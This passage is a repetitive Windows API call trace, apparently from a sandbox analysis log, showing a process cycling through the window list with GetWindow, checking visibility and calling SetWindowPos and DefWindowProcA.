GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.591] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.591] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.591] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.591] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.591] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.591] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.591] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.591] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.591] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.591] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.591] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.591] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.597] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.597] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.597] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.597] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.597] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 
0x300e0 [0057.597] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.597] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.597] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.597] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.597] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.597] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.597] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.597] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.597] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.597] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.597] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.597] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.597] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.597] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.597] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.598] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.598] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.598] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.598] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.598] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.598] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.598] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.598] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.598] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.598] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.598] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.598] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.598] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.598] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.598] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.598] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.598] GetWindow (hWnd=0x200fc, 
uCmd=0x2) returned 0x100f6 [0057.598] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.598] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.598] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.598] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.598] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.598] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.598] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.598] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.598] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.598] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.598] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.598] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.598] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.598] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.599] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.599] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.599] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.599] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.599] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.599] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.599] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.599] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.599] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.599] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.599] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.599] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.599] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.599] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.599] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.599] GetWindow (hWnd=0x10064, uCmd=0x2) 
returned 0x10060 [0057.599] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.599] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.599] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.599] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.599] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.599] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.599] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.599] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.599] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.600] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.600] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.600] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.600] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.600] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.600] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.600] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.600] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.600] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.600] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.600] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.600] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.600] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.600] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.600] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.600] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.600] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.600] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.600] GetWindow (hWnd=0x10188, uCmd=0x2) returned 0x10184 [0057.600] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.600] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.600] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.600] GetWindow (hWnd=0x10182, 
uCmd=0x2) returned 0x1017c [0057.600] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.601] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.601] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.601] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.601] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.601] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.601] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.601] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.601] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.601] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.601] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.601] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.601] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.601] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.601] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.601] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.601] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.601] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.601] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.601] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.601] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.601] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.601] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.601] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.601] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.601] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.602] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.602] GetWindow (hWnd=0x10148, uCmd=0x2) returned 0x1013e [0057.602] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.602] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.602] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.602] 
GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.602] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.602] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.602] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.602] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.602] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.602] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.602] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.602] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.602] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.602] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.602] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.602] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.602] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.602] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.602] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.602] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.602] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.602] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.602] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.603] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.603] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.603] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.603] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.603] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.603] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.603] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.603] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.603] GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.603] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.603] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.603] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 
0x10062 [0057.603] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.603] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.603] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.603] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.603] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.603] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.603] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.603] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.603] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.603] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.603] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.603] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.604] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.604] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.604] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.604] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.604] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.604] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.604] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.604] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.604] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.604] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.604] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.604] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.604] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.604] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.604] GetWindow (hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.604] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.604] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.604] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 
[0057.604] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.604] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.604] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.604] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.604] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.604] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.604] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.604] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.604] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.604] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.604] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.605] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.605] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.605] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.605] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.605] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.605] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.605] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.605] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.605] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.605] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.605] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.605] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.605] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.605] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.605] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.605] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.605] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.605] GetWindow (hWnd=0x1018e, uCmd=0x2) returned 0x1018c [0057.605] GetWindow (hWnd=0x1018c, uCmd=0x2) returned 0x1018a [0057.605] GetWindow (hWnd=0x1018a, uCmd=0x2) returned 0x10188 [0057.605] GetWindow (hWnd=0x10188, uCmd=0x2) returned 
0x10184 [0057.605] GetWindow (hWnd=0x10184, uCmd=0x2) returned 0x10186 [0057.605] GetWindow (hWnd=0x10186, uCmd=0x2) returned 0x10180 [0057.605] GetWindow (hWnd=0x10180, uCmd=0x2) returned 0x10182 [0057.605] GetWindow (hWnd=0x10182, uCmd=0x2) returned 0x1017c [0057.605] GetWindow (hWnd=0x1017c, uCmd=0x2) returned 0x1017e [0057.605] GetWindow (hWnd=0x1017e, uCmd=0x2) returned 0x10178 [0057.605] GetWindow (hWnd=0x10178, uCmd=0x2) returned 0x1017a [0057.605] GetWindow (hWnd=0x1017a, uCmd=0x2) returned 0x10174 [0057.605] GetWindow (hWnd=0x10174, uCmd=0x2) returned 0x10176 [0057.605] GetWindow (hWnd=0x10176, uCmd=0x2) returned 0x10170 [0057.606] GetWindow (hWnd=0x10170, uCmd=0x2) returned 0x10172 [0057.606] GetWindow (hWnd=0x10172, uCmd=0x2) returned 0x1016c [0057.606] GetWindow (hWnd=0x1016c, uCmd=0x2) returned 0x1016e [0057.606] GetWindow (hWnd=0x1016e, uCmd=0x2) returned 0x10168 [0057.606] GetWindow (hWnd=0x10168, uCmd=0x2) returned 0x1016a [0057.606] GetWindow (hWnd=0x1016a, uCmd=0x2) returned 0x10164 [0057.606] GetWindow (hWnd=0x10164, uCmd=0x2) returned 0x10166 [0057.606] GetWindow (hWnd=0x10166, uCmd=0x2) returned 0x10160 [0057.606] GetWindow (hWnd=0x10160, uCmd=0x2) returned 0x10162 [0057.606] GetWindow (hWnd=0x10162, uCmd=0x2) returned 0x1015c [0057.606] GetWindow (hWnd=0x1015c, uCmd=0x2) returned 0x1015e [0057.606] GetWindow (hWnd=0x1015e, uCmd=0x2) returned 0x7013a [0057.606] GetWindow (hWnd=0x7013a, uCmd=0x2) returned 0x1015a [0057.606] GetWindow (hWnd=0x1015a, uCmd=0x2) returned 0x10156 [0057.606] GetWindow (hWnd=0x10156, uCmd=0x2) returned 0x10158 [0057.606] GetWindow (hWnd=0x10158, uCmd=0x2) returned 0x10150 [0057.606] GetWindow (hWnd=0x10150, uCmd=0x2) returned 0x10154 [0057.606] GetWindow (hWnd=0x10154, uCmd=0x2) returned 0x1014a [0057.606] GetWindow (hWnd=0x1014a, uCmd=0x2) returned 0x1014e [0057.606] GetWindow (hWnd=0x1014e, uCmd=0x2) returned 0x10144 [0057.606] GetWindow (hWnd=0x10144, uCmd=0x2) returned 0x10148 [0057.606] GetWindow (hWnd=0x10148, 
uCmd=0x2) returned 0x1013e [0057.606] GetWindow (hWnd=0x1013e, uCmd=0x2) returned 0x10142 [0057.606] GetWindow (hWnd=0x10142, uCmd=0x2) returned 0x10138 [0057.606] GetWindow (hWnd=0x10138, uCmd=0x2) returned 0x1013c [0057.606] GetWindow (hWnd=0x1013c, uCmd=0x2) returned 0x10134 [0057.606] GetWindow (hWnd=0x10134, uCmd=0x2) returned 0x10136 [0057.606] GetWindow (hWnd=0x10136, uCmd=0x2) returned 0x400dc [0057.606] GetWindow (hWnd=0x400dc, uCmd=0x2) returned 0x300e0 [0057.606] GetWindow (hWnd=0x300e0, uCmd=0x2) returned 0x10130 [0057.606] GetWindow (hWnd=0x10130, uCmd=0x2) returned 0x10122 [0057.606] GetWindow (hWnd=0x10122, uCmd=0x2) returned 0x10120 [0057.607] GetWindow (hWnd=0x10120, uCmd=0x2) returned 0x20116 [0057.607] GetWindow (hWnd=0x20116, uCmd=0x2) returned 0x1010a [0057.607] GetWindow (hWnd=0x1010a, uCmd=0x2) returned 0x1010c [0057.607] GetWindow (hWnd=0x1010c, uCmd=0x2) returned 0x2001e [0057.607] GetWindow (hWnd=0x2001e, uCmd=0x2) returned 0x20020 [0057.607] GetWindow (hWnd=0x20020, uCmd=0x2) returned 0x2001c [0057.607] GetWindow (hWnd=0x2001c, uCmd=0x2) returned 0x20016 [0057.607] GetWindow (hWnd=0x20016, uCmd=0x2) returned 0x200ae [0057.607] GetWindow (hWnd=0x200ae, uCmd=0x2) returned 0x2009e [0057.607] GetWindow (hWnd=0x2009e, uCmd=0x2) returned 0x2008c [0057.607] GetWindow (hWnd=0x2008c, uCmd=0x2) returned 0x2008e [0057.607] GetWindow (hWnd=0x2008e, uCmd=0x2) returned 0x20092 [0057.607] GetWindow (hWnd=0x20092, uCmd=0x2) returned 0x2009a [0057.607] GetWindow (hWnd=0x2009a, uCmd=0x2) returned 0x300a8 [0057.607] GetWindow (hWnd=0x300a8, uCmd=0x2) returned 0x20080 [0057.607] GetWindow (hWnd=0x20080, uCmd=0x2) returned 0x100f0 [0057.607] GetWindow (hWnd=0x100f0, uCmd=0x2) returned 0x100f2 [0057.607] GetWindow (hWnd=0x100f2, uCmd=0x2) returned 0x100ea [0057.607] GetWindow (hWnd=0x100ea, uCmd=0x2) returned 0x100e8 [0057.607] GetWindow (hWnd=0x100e8, uCmd=0x2) returned 0x100e4 [0057.607] GetWindow (hWnd=0x100e4, uCmd=0x2) returned 0x100da [0057.607] 
GetWindow (hWnd=0x100da, uCmd=0x2) returned 0x50076 [0057.607] GetWindow (hWnd=0x50076, uCmd=0x2) returned 0x1006c [0057.607] GetWindow (hWnd=0x1006c, uCmd=0x2) returned 0x1006a [0057.607] GetWindow (hWnd=0x1006a, uCmd=0x2) returned 0x10062 [0057.607] GetWindow (hWnd=0x10062, uCmd=0x2) returned 0x10050 [0057.607] GetWindow (hWnd=0x10050, uCmd=0x2) returned 0x200fa [0057.607] GetWindow (hWnd=0x200fa, uCmd=0x2) returned 0x200fc [0057.607] GetWindow (hWnd=0x200fc, uCmd=0x2) returned 0x100f6 [0057.607] GetWindow (hWnd=0x100f6, uCmd=0x2) returned 0x100f8 [0057.607] GetWindow (hWnd=0x100f8, uCmd=0x2) returned 0x1004c [0057.608] GetWindow (hWnd=0x1004c, uCmd=0x2) returned 0x10038 [0057.608] GetWindow (hWnd=0x10038, uCmd=0x2) returned 0x10030 [0057.608] GetWindow (hWnd=0x10030, uCmd=0x2) returned 0x2002c [0057.608] GetWindow (hWnd=0x2002c, uCmd=0x2) returned 0x1002e [0057.608] GetWindow (hWnd=0x1002e, uCmd=0x2) returned 0x20026 [0057.608] GetWindow (hWnd=0x20026, uCmd=0x2) returned 0x1002a [0057.608] GetWindow (hWnd=0x1002a, uCmd=0x2) returned 0x20028 [0057.608] GetWindow (hWnd=0x20028, uCmd=0x2) returned 0x100ee [0057.608] GetWindow (hWnd=0x100ee, uCmd=0x2) returned 0x100ec [0057.608] GetWindow (hWnd=0x100ec, uCmd=0x2) returned 0x100ca [0057.608] GetWindow (hWnd=0x100ca, uCmd=0x2) returned 0x0 [0057.608] SetWindowPos (hWnd=0x601a8, hWndInsertAfter=0x0, X=0, Y=0, cx=0, cy=0, uFlags=0x13) returned 1 [0057.608] DefWindowProcA (hWnd=0x601a8, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.608] DefWindowProcA (hWnd=0x301fc, Msg=0x46, wParam=0x0, lParam=0x12f134) returned 0x0 [0057.608] GetWindow (hWnd=0x601a8, uCmd=0x0) returned 0x10118 [0057.608] GetWindow (hWnd=0x10118, uCmd=0x2) returned 0x10112 [0057.608] GetWindow (hWnd=0x10112, uCmd=0x2) returned 0x10110 [0057.608] GetWindow (hWnd=0x10110, uCmd=0x2) returned 0x200aa [0057.608] GetWindow (hWnd=0x200aa, uCmd=0x2) returned 0x200c6 [0057.608] GetWindow (hWnd=0x200c6, uCmd=0x2) returned 0x200d6 [0057.608] GetWindow 
(hWnd=0x200d6, uCmd=0x2) returned 0x200c4 [0057.608] GetWindow (hWnd=0x200c4, uCmd=0x2) returned 0x1005e [0057.608] GetWindow (hWnd=0x1005e, uCmd=0x2) returned 0x1005c [0057.608] GetWindow (hWnd=0x1005c, uCmd=0x2) returned 0x10048 [0057.608] GetWindow (hWnd=0x10048, uCmd=0x2) returned 0x10072 [0057.608] GetWindow (hWnd=0x10072, uCmd=0x2) returned 0x10066 [0057.608] GetWindow (hWnd=0x10066, uCmd=0x2) returned 0x10064 [0057.608] GetWindow (hWnd=0x10064, uCmd=0x2) returned 0x10060 [0057.608] GetWindow (hWnd=0x10060, uCmd=0x2) returned 0x1003e [0057.609] GetWindow (hWnd=0x1003e, uCmd=0x2) returned 0x1003a [0057.609] GetWindow (hWnd=0x1003a, uCmd=0x2) returned 0x10040 [0057.609] GetWindow (hWnd=0x10040, uCmd=0x2) returned 0x1003c [0057.609] GetWindow (hWnd=0x1003c, uCmd=0x2) returned 0x100d2 [0057.609] GetWindow (hWnd=0x100d2, uCmd=0x2) returned 0x5007c [0057.609] GetWindow (hWnd=0x5007c, uCmd=0x2) returned 0x10074 [0057.609] GetWindow (hWnd=0x10074, uCmd=0x2) returned 0x601a8 [0057.609] IsWindowVisible (hWnd=0x601a8) returned 0 [0057.609] GetWindow (hWnd=0x601a8, uCmd=0x2) returned 0x70104 [0057.609] GetWindow (hWnd=0x70104, uCmd=0x2) returned 0x301fc [0057.609] GetWindow (hWnd=0x301fc, uCmd=0x2) returned 0x401e4 [0057.609] GetWindow (hWnd=0x401e4, uCmd=0x2) returned 0x101e2 [0057.609] GetWindow (hWnd=0x101e2, uCmd=0x2) returned 0x101ac [0057.609] GetWindow (hWnd=0x101ac, uCmd=0x2) returned 0x601a4 [0057.609] GetWindow (hWnd=0x601a4, uCmd=0x2) returned 0x201d4 [0057.609] GetWindow (hWnd=0x201d4, uCmd=0x2) returned 0x101b6 [0057.609] GetWindow (hWnd=0x101b6, uCmd=0x2) returned 0x101c8 [0057.609] GetWindow (hWnd=0x101c8, uCmd=0x2) returned 0x201c4 [0057.609] GetWindow (hWnd=0x201c4, uCmd=0x2) returned 0x101b8 [0057.609] GetWindow (hWnd=0x101b8, uCmd=0x2) returned 0x101aa [0057.609] GetWindow (hWnd=0x101aa, uCmd=0x2) returned 0x10192 [0057.609] GetWindow (hWnd=0x10192, uCmd=0x2) returned 0x10190 [0057.609] GetWindow (hWnd=0x10190, uCmd=0x2) returned 0x1018e [0057.609] 
